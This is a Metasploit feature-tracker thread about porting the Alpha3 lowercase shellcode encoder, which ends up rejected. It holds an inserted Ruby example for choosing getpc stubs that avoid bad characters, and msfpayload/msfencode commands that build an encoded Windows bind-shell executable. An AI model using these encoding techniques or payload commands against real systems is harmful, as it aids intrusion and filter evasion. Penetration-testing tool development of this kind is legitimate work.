Feature #2480
Addition of the Alpha3 Encoder
| Status: | Rejected | Start date: | 09/01/2010 |
|---|---|---|---|
| Priority: | Normal | Due date: | |
| Assignee: | - | % Done: | 0% |
| Category: | payloads | | |
| Target version: | Open Backlog | | |
| Resolution: | | How To Use: | |
| Release Note: | | | |
Description
Since the Alpha3 Encoder apparently has a smaller decoder and additional encoding options, it could be a good addition to MSF.
http://code.google.com/p/alpha3/
"The improvements over ALPHA2 include new encodings (x86 lowercase ascii and x64 mixedcase ascii) and smaller decoders for various other encodings."
History
Updated by Peter Van Eeckhoutte over 1 year ago
Sent in first draft of the alpha3 lowercase encoder.
If this one works, I'll try to port the other ones as well.
Updated by James Lee over 1 year ago
Peter, can you attach that here as the output of "svn diff" from the metasploit base directory, please?
Updated by Peter Van Eeckhoutte over 1 year ago
- File corelanc0d3r_alpha3lower.tar.gz added
I have attached the most important (new) files:
lib/msf/core/encoder/alphalower.rb
lib/rex/encoder/alpha3.rb
lib/rex/encoder/alpha3/alpha_lower.rb
modules/encoders/x86/alpha_lower.rb
Please note that the code is not able to filter out bad chars, it does not accept null bytes in the source (raw) shellcode, and it requires a BufferRegister (ebx, ecx or edx).
(=> I believe those limitations are also present in skylined's original scripts - I just ported his routine)
Updated by Joshua J. Drake over 1 year ago
- Category set to payloads
Indeed it does. That's likely why no one has ported it.
I'm not so sure if this is the kind of encoder that is useful for us.
Updated by James Lee over 1 year ago
One possibility to make the most of these encoders would be to combine them with Alpha2 and only use them in cases where those conditions are met (no badchars, no nulls, have BufferRegister).
Updated by Peter Van Eeckhoutte over 1 year ago
- File alpha_lower.rb added
Updated alpha_lower.rb (modules/encoders/x86/alpha_lower.rb):
- inline encoding if source contains null bytes
- creates a getpc stub if no bufferregister is given
Updated by Peter Van Eeckhoutte over 1 year ago
To do:
- try different getpc stubs until one satisfies badchars, or raise an exception (and mention use of BufferRegister)
- if an invalid BufferRegister is specified, then either ignore it (and use getpc), or change it to ebx
- ...
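The two to-do items in the comment above (walk a list of getpc stubs until one avoids the badchars, otherwise raise and point the user at BufferRegister; fall back to getpc when an invalid register is given) and James Lee's earlier suggestion of only routing a payload to this decoder when its preconditions hold, worked through as an added example. This is illustration code written for this page, not the submitted alpha_lower.rb and not Metasploit's own code. The stub byte sequences are the well-known x86 fnstenv, jmp/call/pop and call/pop getpc idioms; the rule that only ebx, ecx and edx are acceptable buffer registers is taken from the thread; function and key names are this example's own.

```ruby
# Added example (not the submitted alpha_lower.rb, not Metasploit code):
# getpc stub selection against badchars, BufferRegister fallback, and a
# precondition gate for the alpha3 lowercase decoder described in the thread.

# pop <reg> opcodes for the registers the ported decoder accepts (from the thread).
POP_REG = { 'ebx' => "\x5b".b, 'ecx' => "\x59".b, 'edx' => "\x5a".b }.freeze

# Candidate getpc stubs, in order of preference. :points_to records what the
# register holds afterwards; the caller must account for that offset when it
# places the decoder and the encoded payload behind the stub.
def getpc_stubs(reg)
  pop = POP_REG.fetch(reg)
  [
    # fldz; fnstenv [esp-0xc]; pop reg  -> reg = address of fldz (stub start)
    { name: 'fnstenv',      bytes: "\xd9\xee\xd9\x74\x24\xf4".b + pop, points_to: :stub_start },
    # jmp +3; pop reg; jmp +5; call -8  -> reg = address just after the stub
    { name: 'jmp/call/pop', bytes: "\xeb\x03".b + pop + "\xeb\x05\xe8\xf8\xff\xff\xff".b, points_to: :stub_end },
    # call $+5; pop reg  -> reg = address just after the stub; contains nulls
    { name: 'call/pop',     bytes: "\xe8\x00\x00\x00\x00".b + pop, points_to: :stub_end },
  ]
end

def contains_badchars?(buf, badchars)
  bad = badchars.b.bytes
  buf.b.bytes.any? { |byte| bad.include?(byte) }
end

# First to-do item: return the first stub that avoids every badchar, or raise
# with a message that tells the user to supply BufferRegister instead.
def select_getpc(reg, badchars)
  getpc_stubs(reg).each do |stub|
    return stub unless contains_badchars?(stub[:bytes], badchars)
  end
  raise ArgumentError,
        "no getpc stub avoids badchars #{badchars.b.unpack1('H*')}; " \
        "set BufferRegister (ebx, ecx or edx) to a register that already " \
        "points at the encoded payload"
end

# Second to-do item: honour a valid BufferRegister; on a missing or invalid one
# (eax, esi, "foo", nil ...) ignore it and locate the payload with getpc in ebx.
def resolve_buffer_register(requested, badchars)
  reg = requested.to_s.downcase
  return { register: reg, stub: ''.b, via: 'BufferRegister' } if POP_REG.key?(reg)

  stub = select_getpc('ebx', badchars)
  { register: 'ebx', stub: stub[:bytes], via: stub[:name], points_to: stub[:points_to] }
end

# Gate from the discussion above: the ported decoder cannot filter badchars,
# rejects null bytes in the input and needs a buffer register, so a wrapper
# would route anything that fails these checks to alpha2 instead.
def alpha3_unmet_preconditions(shellcode, badchars, buffer_register)
  unmet = []
  unmet << 'shellcode contains null bytes' if shellcode.b.include?("\x00".b)
  unmet << 'badchars requested but decoder cannot filter them' unless badchars.b.empty?
  unmet << 'no valid BufferRegister (ebx, ecx or edx)' unless POP_REG.key?(buffer_register.to_s.downcase)
  unmet
end

if __FILE__ == $PROGRAM_NAME
  # Constructed inputs: a short null-free dummy payload and a typical badchar set.
  payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68".b
  puts alpha3_unmet_preconditions(payload, ''.b, 'ecx').inspect
  puts alpha3_unmet_preconditions(payload, "\x0a".b, 'eax').inspect
  choice = resolve_buffer_register('eax', "\x00".b)
  puts "#{choice[:via]} -> #{choice[:register]} (#{choice[:stub].unpack1('H*')})"
end
```

The order of the stub list is the policy: the fnstenv stub is tried first because it is null-free and short, the jmp/call/pop stub covers the case where 0xd9 is banned, and the call/pop stub is only reachable when nulls are allowed. Whichever stub wins, the encoder still has to adjust for whether the register points at the stub start or the stub end before it can use the register as the decoder's base.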
Updated by Peter Van Eeckhoutte about 1 year ago
- File alpha_lower.rb added
Updated alpha_lower.rb (modules/encoders/x86/alpha_lower.rb):
- added alternative getpc routine
- if an invalid BufferRegister is specified, getpc is used
Updated by Tod Beardsley 4 months ago
- Status changed from New to HavePatch
- Target version set to Metasploit 4.3.0
Updated by Tod Beardsley 3 months ago
- File alpha_lower.diff added
- Target version changed from Metasploit 4.3.0 to Open Backlog
- 10 set to 0
I apologize for the long lag on this. I've fixed a couple typos in the submitted code, and created a diff patch version. However, in some simple testing, the encoder seems to loop forever.
If I'm doing it wrong, please let me know with some testing guidance and reopen this ticket.
Here's my quick test, which passes with alpha_upper:

```
$ ./msfpayload windows/shell_bind_tcp LPORT=13222 X | ./msfencode -e "x86/alpha_upper" > /tmp/met2.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_bind_tcp
Length: 341
Options: {"LPORT"=>"13222"}
[*] x86/alpha_upper succeeded with size 147672 (iteration=1)
$ ./msfpayload windows/shell_bind_tcp LPORT=13333 X | ./msfencode -e "x86/alpha_lower" > /tmp/met3.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_bind_tcp
Length: 341
Options: {"LPORT"=>"13333"} # Wait here for many minutes
^C/home/todb/proj/msf3/trunk/lib/msf/core/encoder.rb:310:in `do_encode': Interrupt
from /home/todb/proj/msf3/trunk/lib/msf/core/encoder/xor_additive_feedback.rb:59:in `find_key'
from /home/todb/proj/msf3/trunk/lib/msf/core/encoder.rb:428:in `obtain_key'
from /home/todb/proj/msf3/trunk/lib/msf/core/encoder.rb:255:in `encode'
from /home/todb/proj/msf3/trunk/lib/msf/util/exe.rb:1135:in `block in encode_stub'
from /home/todb/proj/msf3/trunk/lib/msf/core/module_manager.rb:242:in `call'
from /home/todb/proj/msf3/trunk/lib/msf/core/module_manager.rb:242:in `block in each_module_list'
from /home/todb/proj/msf3/trunk/lib/msf/core/module_manager.rb:215:in `each'
from /home/todb/proj/msf3/trunk/lib/msf/core/module_manager.rb:215:in `each_module_list'
from /home/todb/proj/msf3/trunk/lib/msf/core/module_manager.rb:145:in `each_module_ranked'
from /home/todb/proj/msf3/trunk/lib/msf/util/exe.rb:1132:in `encode_stub'
from (eval):143:in `encode_block'
from /home/todb/proj/msf3/trunk/lib/msf/core/encoder.rb:316:in `do_encode'
from /home/todb/proj/msf3/trunk/lib/msf/core/encoder.rb:270:in `encode'
from ./msfencode:244:in `block (2 levels) in <main>'
from ./msfencode:241:in `upto'
from ./msfencode:241:in `block in <main>'
from ./msfencode:231:in `each'
from ./msfencode:231:in `<main>'
```
Updated by Tod Beardsley 3 months ago
- Status changed from HavePatch to Rejected